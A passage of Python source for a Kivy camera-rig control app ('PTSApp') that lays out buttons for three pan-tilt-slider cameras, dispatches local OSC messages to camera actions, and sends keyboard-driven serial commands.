pos: (app.xDiv*110), (app.yDiv*10)
size: (app.xDiv*11), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text: "Record"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.sendCam2RecordToggle()
Button:
id: btnCam2Clr
text:"Clear"
#size_hint: 0.046, 0.086
#pos_hint: {'x':.94, 'y':.135}
pos: (app.xDiv*126), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendClearCam2Pos()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go1
text:"1"
pos: (app.xDiv*1), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go1()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go2
text:"2"
pos: (app.xDiv*9), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go2()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go3
text:"3"
pos: (app.xDiv*17), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go3()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go4
text:"4"
pos: (app.xDiv*25), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go4()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go5
text:"5"
pos: (app.xDiv*33), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go5()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go6
text:"6"
pos: (app.xDiv*41), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go6()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3PT-
text: "PT\\n-"
halign: 'center'
pos: (app.xDiv*51), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3PTSpeedDec()
Button:
id: btnCam3PT+
text: "PT\\n+"
halign: 'center'
pos: (app.xDiv*64), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3PTSpeedInc()
Button:
id: btnCam3Sl-
text: "Sl\\n-"
halign: 'center'
pos: (app.xDiv*72), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3SliderSpeedDec()
Button:
id: btnCam3Sl+
text: "Sl\\n+"
halign: 'center'
pos: (app.xDiv*85), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3SliderSpeedInc()
Button:
id: btnCam3Zm-
text:"Zm\\nOUT"
halign: 'center'
pos: (app.xDiv*93), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3ZoomOut()
#on_release: app.sendCam3ZoomStop()
Button:
id: btnCam3Zm+
text:"Zm\\nIN"
halign: 'center'
pos: (app.xDiv*101), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3ZoomIn()
#on_release: app.sendCam3ZoomStop()
Button:
id: cam3Record
#size_hint: 0.08, 0.056
#pos_hint: {'x':.825, 'y':.04}
pos: (app.xDiv*110), (app.yDiv*2)
size: (app.xDiv*11), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text: "Record"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.sendCam3RecordToggle()
Button:
id: btnCam3Clr
text:"Clear"
#size_hint: 0.046, 0.086
#pos_hint: {'x':.94, 'y':.025}
pos: (app.xDiv*126), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendClearCam3Pos()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
MDFillRoundFlatButton:
id: buttonWhichCam1
text: "Cam 1"
#user_font_size: "30sp"
line_width: 5
line_color: 1, 0, 0, 1
md_bg_color: get_color_from_hex("#208020")
pos: (app.xDiv*39.5), (app.yDiv*57)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.whichCamSerial1()
MDFillRoundFlatButton:
id: buttonWhichCam2
text: "Cam 2"
#user_font_size: "30sp"
line_width: 5
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#405C80")
pos: (app.xDiv*39.5), (app.yDiv*49)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.whichCamSerial2()
MDFillRoundFlatButton:
id: buttonWhichCam3
text: "Cam 3"
#user_font_size: "30sp"
line_width: 5
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#807100")
pos: (app.xDiv*39.5), (app.yDiv*41)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.whichCamSerial3()
MDFillRoundFlatButton:
id: btn_Report
text: "Report"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*65), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.btnReport()
MDFillRoundFlatButton:
id: btn_Report
text: "Report Pos"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*78), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.btnReportPos()
MDFillRoundFlatButton:
id: btn_Report
text: "Report Key"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*94), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.btnReportKey()
MDFillRoundFlatButton:
id: btn_scan
text: "Scan Ports"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*109), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.on_btn_scan_release()
MDFillRoundFlatButton:
id: btn_help
text: "Help"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*124), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.on_btn_help_release()
"""
def filter_handler(address, *args):
global moveType
#print(f"{address}: {args}") # Debug - Watch incomming OSC events
if address == "/setPos":
MDApp.get_running_app().setPos(args[0])
elif address == "/Cam1Go1" and args[0] == 1:
MDApp.get_running_app().Cam1Go1()
elif address == "/Cam1Go2" and args[0] == 1:
MDApp.get_running_app().Cam1Go2()
elif address == "/Cam1Go3" and args[0] == 1:
MDApp.get_running_app().Cam1Go3()
elif address == "/Cam1Go4" and args[0] == 1:
MDApp.get_running_app().Cam1Go4()
elif address == "/Cam1Go5" and args[0] == 1:
MDApp.get_running_app().Cam1Go5()
elif address == "/Cam1Go6" and args[0] == 1:
MDApp.get_running_app().Cam1Go6()
elif address == "/Cam2Go1" and args[0] == 1:
MDApp.get_running_app().Cam2Go1()
elif address == "/Cam2Go2" and args[0] == 1:
MDApp.get_running_app().Cam2Go2()
elif address == "/Cam2Go3" and args[0] == 1:
MDApp.get_running_app().Cam2Go3()
elif address == "/Cam2Go4" and args[0] == 1:
MDApp.get_running_app().Cam2Go4()
elif address == "/Cam2Go5" and args[0] == 1:
MDApp.get_running_app().Cam2Go5()
elif address == "/Cam2Go6" and args[0] == 1:
MDApp.get_running_app().Cam2Go6()
elif address == "/Cam3Go1" and args[0] == 1:
MDApp.get_running_app().Cam3Go1()
elif address == "/Cam3Go2" and args[0] == 1:
MDApp.get_running_app().Cam3Go2()
elif address == "/Cam3Go3" and args[0] == 1:
MDApp.get_running_app().Cam3Go3()
elif address == "/Cam3Go4" and args[0] == 1:
MDApp.get_running_app().Cam3Go4()
elif address == "/Cam3Go5" and args[0] == 1:
MDApp.get_running_app().Cam3Go5()
elif address == "/Cam3Go6" and args[0] == 1:
MDApp.get_running_app().Cam3Go6()
elif address == "/Cam1PTSpdInc" and args[0] == 0:
MDApp.get_running_app().sendCam1PTSpeedInc()
elif address == "/Cam1PTSpdDec" and args[0] == 1:
MDApp.get_running_app().sendCam1PTSpeedDec()
elif address == "/Cam1SlSpdInc" and args[0] == 2:
MDApp.get_running_app().sendCam1SlSpeedInc()
elif address == "/Cam1SlSpdDec" and args[0] == 3:
MDApp.get_running_app().sendCam1SlSpeedDec()
elif address == "/Cam2PTSpd":
MDApp.get_running_app().sendCam2PTSpeedOSC(args[0])
elif address == "/Cam2SlSpd":
MDApp.get_running_app().sendCam2SlSpeedOSC(args[0])
elif address == "/Cam3PTSpdInc" and args[0] == 0:
MDApp.get_running_app().sendCam3PTSpeedInc()
elif address == "/Cam3PTSpdDec" and args[0] == 1:
MDApp.get_running_app().sendCam3PTSpeedDec()
elif address == "/Cam3SlSpdInc" and args[0] == 2:
MDApp.get_running_app().sendCam3SlSpeedInc()
elif address == "/Cam3SlSpdDec" and args[0] == 3:
MDApp.get_running_app().sendCam3SlSpeedDec()
elif address == "/Cam1ZoomIn" and args[0] == 1:
MDApp.get_running_app().sendCam1ZoomIn()
elif address == "/Cam1ZoomOut" and args[0] == 1:
MDApp.get_running_app().sendCam1ZoomOut()
elif address == "/Cam1ZoomStop" and args[0] == 1:
MDApp.get_running_app().sendCam1ZoomStop()
elif address == "/Cam2ZoomIn" and args[0] == 1:
MDApp.get_running_app().sendCam2ZoomIn()
elif address == "/Cam2ZoomOut" and args[0] == 1:
MDApp.get_running_app().sendCam2ZoomOut()
elif address == "/Cam2ZoomStop" and args[0] == 1:
MDApp.get_running_app().sendCam2ZoomStop()
elif address == "/Cam3ZoomIn" and args[0] == 1:
MDApp.get_running_app().sendCam3ZoomIn()
elif address == "/Cam3ZoomOut" and args[0] == 1:
MDApp.get_running_app().sendCam3ZoomOut()
elif address == "/Cam3ZoomStop" and args[0] == 1:
MDApp.get_running_app().sendCam3ZoomStop()
elif address == "/Cam1Clr" and args[0] == 1:
MDApp.get_running_app().sendClearCam1Pos()
elif address == "/Cam2Clr" and args[0] == 1:
MDApp.get_running_app().sendClearCam2Pos()
elif address == "/Cam3Clr" and args[0] == 1:
MDApp.get_running_app().sendClearCam3Pos()
elif address == "/Cam1Rec" and args[0] == 1:
MDApp.get_running_app().sendCam1RecordToggleOSC()
elif address == "/Cam2Rec" and args[0] == 1:
MDApp.get_running_app().sendCam2RecordToggleOSC()
elif address == "/Cam3Rec" and args[0] == 1:
MDApp.get_running_app().sendCam3RecordToggleOSC()
elif address == "/moveType" and args[0] == 1:
moveType = 1
MDApp.get_running_app().doButtonColours()
elif address == "/moveType" and args[0] == 2:
moveType = 2
MDApp.get_running_app().doButtonColours()
elif address == "/moveType" and args[0] == 3:
moveType = 3
MDApp.get_running_app().doButtonColours()
elif address == "/Cam1Left" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'a')
elif address == "/Cam1Right" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'd')
elif address == "/Cam1Up" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'w')
elif address == "/Cam1Down" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 's')
elif address == "/Cam1SlLeft" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, ',')
elif address == "/Cam1SlRight" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, '.')
elif address == "/Cam1LeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'A')
elif address == "/Cam1RightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'D')
elif address == "/Cam1UpRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'W')
elif address == "/Cam1DownRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'S')
elif address == "/Cam1SlLeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, '<')
elif address == "/Cam1SlRightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, '>')
elif address == "/Cam2Left" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'a')
elif address == "/Cam2Right" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'd')
elif address == "/Cam2Up" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'w')
elif address == "/Cam2Down" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 's')
elif address == "/Cam2SlLeft" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, ',')
elif address == "/Cam2SlRight" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, '.')
elif address == "/Cam2LeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'A')
elif address == "/Cam2RightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'D')
elif address == "/Cam2UpRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'W')
elif address == "/Cam2DownRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'S')
elif address == "/Cam2SlLeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, '<')
elif address == "/Cam2SlRightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, '>')
elif address == "/Cam3Left" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'a')
elif address == "/Cam3Right" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'd')
elif address == "/Cam3Up" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'w')
elif address == "/Cam3Down" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 's')
elif address == "/Cam3SlLeft" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, ',')
elif address == "/Cam3SlRight" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, '.')
elif address == "/Cam3LeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'A')
elif address == "/Cam3RightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'D')
elif address == "/Cam3UpRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'W')
elif address == "/Cam3DownRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'S')
elif address == "/Cam3SlLeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, '<')
elif address == "/Cam3SlRightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, '>')
elif address == "/Cam1PTSpeedInc" and args[0] == 1:
MDApp.get_running_app().sendCam1PTSpeedInc()
elif address == "/Cam1PTSpeedDec" and args[0] == 1:
MDApp.get_running_app().sendCam1PTSpeedDec()
elif address == "/Cam2PTSpeedInc" and args[0] == 1:
MDApp.get_running_app().sendCam2PTSpeedInc()
elif address == "/Cam2PTSpeedDec" and args[0] == 1:
MDApp.get_running_app().sendCam2PTSpeedDec()
elif address == "/Cam3PTSpeedInc" and args[0] == 1:
MDApp.get_running_app().sendCam3PTSpeedInc()
elif address == "/Cam3PTSpeedDec" and args[0] == 1:
MDApp.get_running_app().sendCam3PTSpeedDec()
dispatcher = Dispatcher()
dispatcher.map("/*", filter_handler)
ip = "127.0.0.1"
srvPort = 6503
cliPort = 1337
client = SimpleUDPClient(ip, cliPort)
class EventLoopWorker(EventDispatcher):
__events__ = ('on_pulse',) # defines this EventDispatcher's sole event
def __init__(self):
super().__init__()
self._thread = threading.Thread(target=self._run_loop) # note the Thread target here
self._thread.daemon = True
self.loop = None
# the following are for the pulse() coroutine, see below
self._default_pulse = ['OSC Enabled\n']
self._pulse = None
self._pulse_task = None
def _run_loop(self):
self.loop = asyncio.get_event_loop_policy().new_event_loop()
asyncio.set_event_loop(self.loop)
self._restart_pulse()
# this example doesn't include any cleanup code, see the docs on how
# to properly set up and tear down an asyncio event loop
self.loop.run_forever()
def start(self):
self._thread.start()
async def pulse(self):
"""Core coroutine of this asyncio event loop.
Repeats a pulse message in a short interval on three channels:
- using `print()`
- by dispatching a Kivy event `on_pulse` with the help of `@mainthread`
- on the Kivy thread through `kivy_update_status()` with the help of
`@mainthread`
The decorator `@mainthread` is a convenience wrapper around
`Clock.schedule_once()` which ensures the callables run on the Kivy
thread.
"""
#for msg in self._pulse_messages():
# show it through the console:
#print(msg)
# `EventLoopWorker` is an `EventDispatcher` to which others can
# subscribe. See `display_on_pulse()` in `start_event_loop_thread()`
# on how it is bound to the `on_pulse` event. The indirection
# through the `notify()` function is necessary to apply the
# `@mainthread` decorator (left label):
# @mainthread
# def notify(text):
# self.dispatch('on_pulse', text)
# notify(msg) # dispatch the on_pulse event
# Same, but with a direct call instead of an event (right label):
#@mainthread
#def kivy_update_status(text):
# status_label = App.get_running_app().root.ids.status
# status_label.text = text
#kivy_update_status(msg) # control a Label directly
await asyncio.sleep(0.1)
server = AsyncIOOSCUDPServer((ip, srvPort), dispatcher, asyncio.get_event_loop())
transport, protocol = await server.create_serve_endpoint() # Create datagram endpoint and start serving
global resetButtons
resetButtons = True
def set_pulse_text(self, text):
self._pulse = text
self._restart_pulse()
def _restart_pulse(self):
"""Helper to start/reset the pulse task when the pulse changes."""
if self._pulse_task is not None:
self._pulse_task.cancel()
self._pulse_task = self.loop.create_task(self.pulse())
def on_pulse(self, *_):
"""An EventDispatcher event must have a corresponding method."""
pass
def _pulse_messages(self):
"""A generator providing an inexhaustible supply of pulse messages."""
while True:
if isinstance(self._pulse, str) and self._pulse != '':
pulse = self._pulse.split()
yield from pulse
else:
yield from self._default_pulse
class PTSApp(MDApp):
xDiv = NumericProperty(xDivSet) # 10 / 1340
yDiv = NumericProperty(yDivSet) # 10 / 703
xScreen = NumericProperty(xScreenSet)
yScreen = NumericProperty(yScreenSet)
def __init__(self, *args, **kwargs):
global Cam1ButColour
global Cam2ButColour
global Cam3ButColour
self.Cam1ButColour = Cam1ButColour
self.Cam2ButColour = Cam2ButColour
self.Cam3ButColour = Cam3ButColour
self.uiDict = {}
self.device_name_list = []
self.serial_port = None
self.read_thread = None
#self.port_thread_lock = threading.Lock()
#base_path = Path(__file__).parent
#image_path = (base_path / "./PTSApp-Icon.png").resolve()
#self.icon = os.path.join(image_path)
super(PTSApp, self).__init__(*args, **kwargs)
self.event_loop_worker = None
def build(self):
global PTJoy
global srvPort
global cliPort
self.screen = Builder.load_string(KV)
Window.bind(mouse_pos=self.mouse_pos)
Window.bind(on_touch_up = self.on_touch_up)
Window.bind(on_request_close = self.stopping)
Window.bind(on_key_down = self.keyDown)
#listener = Listener(on_press = self.on_press, on_release=self.on_release)
#listener.start()
Clock.schedule_interval(self.flash, 1.0)
Clock.schedule_interval(self.doJoyMoves, 0.1)
self.start_event_loop_thread()
Clock.schedule_once(self.showPorts, 0)
self.icon = 'PTSApp-Icon.png'
return self.screen
def keyDown(self, instance, keyboard, keycode, text, modifiers):
global axisX
global axisY
global axisZ
global Cam1TextColour
global Cam2TextColour
global Cam3TextColour
if self.root.ids.textInput.focus == False: # a= 4, s= 22, d=7, w= 26, ,=54, .=55
#print(keycode)
if keycode == 4:
axisX = -255
if keycode == 7:
axisX = 255
if keycode == 26:
axisY = -255
if keycode == 22:
axisY = 255
if keycode == 54:
axisZ = -255
if keycode == 55:
axisZ = 255
self.doJoyMoves(1)
self.doButtonColours()
if keycode == 40 and (self.root.ids.textInput.focus == True):
global whichCamSerial
if whichCamSerial == 1:
temp = "??"
elif whichCamSerial == 2:
temp = "!?"
elif whichCamSerial == 3:
temp = "@?"
tempInput = (self.root.ids.textInput.text)
temp += tempInput
#print(temp) # for debugging
if self.serial_port and self.serial_port.is_open:
self.sendSerial(str(temp.encode()))
Clock.schedule_once(self.clearTextInput, 0)
if whichCamSerial == 1:
self.root.ids.txtInput_read.text += ("[color=" + Cam1TextColour + "]Sent command: " + tempInput + "[/color]\n")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamSerial == 2:
self.root.ids.txtInput_read.text += ("[color=" + Cam2TextColour + "]Sent command: " + tempInput + "[/color]\n")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamSerial == 3:
self.root.ids.txtInput_read.text += ("[color=" + Cam3TextColour + "]Sent command: " + tempInput + "[/color]\n")
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Port not connected.\n[/color]"
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
self.root.ids.scroll_view.scroll_y = 0
Clock.schedule_once(self.clearTextInput, 0)
def clearTextInput(self, dt):
self.root.ids.textInput.text = ""
def showPorts(self, dt):
#self.root.ids.OSCSend.text = "OSC Server Port: " + str(srvPort)
#self.root.ids.OSCRec.text = "OSC Client Port: " + str(cliPort)
return
def stopping(self, dt):
global whileLoopRun
whileLoopRun = False
sys.exit()
def start_event_loop_thread(self):
"""Start the asyncio event loop thread. Bound to the top button."""
if self.event_loop_worker is not None:
print("loop event worker is not NONE")
return
#self.root.ids.btn_OSC.text = ("OSC ON")
self.event_loop_worker = worker = EventLoopWorker()
#pulse_listener_label = self.root.ids.pulse_listener
def display_on_pulse(instance, text):
self.root.ids.txtInput_read.text += text
self.root.ids.scroll_view.scroll_y = 0
#print(text)
#pulse_listener_label.text = text
# make the label react to the worker's `on_pulse` event:
worker.bind(on_pulse=display_on_pulse)
worker.start()
def submit_pulse_text(self, text):
"""Send the TextInput string over to the asyncio event loop worker."""
worker = self.event_loop_worker
if worker is not None:
loop = self.event_loop_worker.loop
# use the thread safe variant to run it on the asyncio event loop:
loop.call_soon_threadsafe(worker.set_pulse_text, text)
'''
def on_press(self, key):
global axisX
global axisY
global axisZ
global doKeyControlA
global doKeyControlD
global doKeyControlW
global doKeyControlS
global doKeyControlSL
global doKeyControlSR
global panKeyPressed
global sliderKeyPressed
global PTKeyChange
global SlKeyChange
global doKeyControl
global whichCamSerial
global xDivSet
global yDivSet
StreamDeck = True
'''
'''
if doKeyControl:
try:
if hasattr(key, 'char'):
if key.char == 'a':
axisX = -255
doKeyControlA = True
PTKeyChange = True
xKeySet = (xDivSet*4)
elif key.char == 'd':
axisX = 255
doKeyControlD = True
PTKeyChange = True
xKeySet = (xDivSet*36)
elif key.char == 'w':
axisY = -255
doKeyControlW = True
PTKeyChange = True
yKeySet = (yDivSet*67)
elif key.char == 's':
axisY = 255
doKeyControlS = True
PTKeyChange = True
yKeySet = (yDivSet*35)
elif key.char == 'z':
axisZ = -255
doKeyControlSL = True
SlKeyChange = True
elif key.char == 'x':
axisZ = 255
doKeyControlSR = True
SlKeyChange = True
elif key.char == 'r':
if StreamDeck and cam1Pos1Set and not cam1AtPos1:
self.sendSerial('&z')
elif key.char == 'f':
if StreamDeck and cam2Pos1Set and not cam2AtPos1:
self.sendSerial('&a')
elif key.char == 'v':
if StreamDeck and cam3Pos1Set and not cam3AtPos1:
self.sendSerial('&q')
elif key.char == 'R':
if StreamDeck:
self.sendSerial('&Z')
elif key.char == 'F':
if StreamDeck:
self.sendSerial('&A')
elif key.char == 'V':
if StreamDeck:
self.sendSerial('&Q')
elif key.char == 't':
if StreamDeck and cam1Pos2Set and not cam1AtPos2:
self.sendSerial('&x')
elif key.char == 'g':
if StreamDeck and cam2Pos2Set and not cam2AtPos2:
self.sendSerial('&s')
elif key.char == 'b':
if StreamDeck and cam3Pos2Set and not cam3AtPos2:
self.sendSerial('&w')
elif key.char == 'T':
if StreamDeck:
self.sendSerial('&X')
elif key.char == 'G':
if StreamDeck:
self.sendSerial('&S')
elif key.char == 'B':
if StreamDeck:
self.sendSerial('&W')
elif key.char == 'y':
if StreamDeck and cam1Pos3Set and not cam1AtPos3:
self.sendSerial('&c')
elif key.char == 'h':
if StreamDeck and cam2Pos3Set and not cam2AtPos3:
self.sendSerial('&d')
elif key.char == 'n':
if StreamDeck and cam3Pos3Set and not cam3AtPos3:
self.sendSerial('&e')
elif key.char == 'Y':
if StreamDeck:
self.sendSerial('&C')
elif key.char == 'H':
if StreamDeck:
self.sendSerial('&D')
elif key.char == 'N':
if StreamDeck:
self.sendSerial('&E')
elif key.char == 'u':
if StreamDeck and cam1Pos4Set and not cam1AtPos4:
self.sendSerial('&v')
elif key.char == 'j':
if StreamDeck and cam2Pos4Set and not cam2AtPos4:
self.sendSerial('&f')
elif key.char == 'm':
if StreamDeck and cam3Pos4Set and not cam3AtPos4:
self.sendSerial('&r')
elif key.char == 'U':
if StreamDeck:
self.sendSerial('&V')
elif key.char == 'J':
if StreamDeck:
self.sendSerial('&F')
elif key.char == 'M':
if StreamDeck:
self.sendSerial('&R')
elif key.char == 'i':
if StreamDeck and cam1Pos5Set and not cam1AtPos5:
self.sendSerial('&b')
elif key.char == 'k':
if StreamDeck and cam2Pos5Set and not cam2AtPos5:
self.sendSerial('&g')
elif key.char == ',':
if StreamDeck and cam3Pos5Set and not cam3AtPos5:
self.sendSerial('&t')
elif key.char == 'I':
if StreamDeck:
self.sendSerial('&B')
elif key.char == 'K':
if StreamDeck:
self.sendSerial('&G')
elif key.char == '<':
if StreamDeck:
self.sendSerial('&T')
elif key.char == 'o':
if StreamDeck and cam1Pos6Set and not cam1AtPos6:
self.sendSerial('&n')
elif key.char == 'l':
if StreamDeck and cam2Pos6Set and not cam2AtPos6:
self.sendSerial('&h')
elif key.char == '.':
if StreamDeck and cam3Pos6Set and not cam3AtPos6:
self.sendSerial('&y')
elif key.char == 'O':
if StreamDeck:
self.sendSerial('&N')
elif key.char == 'L':
if StreamDeck:
self.sendSerial('&H')
elif key.char == '>':
if StreamDeck:
self.sendSerial('&Y')
if not mousePTClick:
self.root.ids.PTJoyDot.pos = (xKeySet, yKeySet)
#PTXMin = (xDivSet*4)
#PTXMax = (xDivSet*36)
#PTYMin = (yDivSet*35)
#PTYMax = (yDivSet*67)
elif key.name == 'tab':
if whichCamSerial == 1:
whichCamSerial = 2;
elif whichCamSerial == 2:
whichCamSerial = 3;
elif whichCamSerial == 3:
whichCamSerial = 1;
except:
return
if (doKeyControlA or doKeyControlD or doKeyControlW or doKeyControlS):
panKeyPressed = True
if (doKeyControlSL or doKeyControlSR):
sliderKeyPressed = True
'''
'''
def on_release(self, key):
global axisX
global axisY
global axisZ
global doKeyControlA
global doKeyControlD
global doKeyControlW
global doKeyControlS
global doKeyControlSL
global doKeyControlSR
global PTKeyChange
global SlKeyChange
global doKeyControl
global panKeyPressed
global sliderKeyPressed
global xDivSet
global yDivSet
'''
'''
if doKeyControl:
try:
if hasattr(key, 'char'):
if key.char == 'a':
doKeyControlA = False
PTKeyChange = True
if not doKeyControlD:
axisX = 0
else:
axisX = 255
elif key.char == 'd':
doKeyControlD = False
PTKeyChange = True
if not doKeyControlA:
axisX = 0
else:
axisX = -255
elif key.char == 'w':
doKeyControlW = False
PTKeyChange = True
if not doKeyControlS:
axisY = 0
else:
axisY = -255
elif key.char == 's':
doKeyControlS = False
PTKeyChange = True
if not doKeyControlW:
axisY = 0
else:
axisY = 255
elif key.char == ',':
doKeyControlSL = False
SlKeyChange = True
if not doKeyControlSR:
axisZ = 0
else:
axisZ = 255
elif key.char == '.':
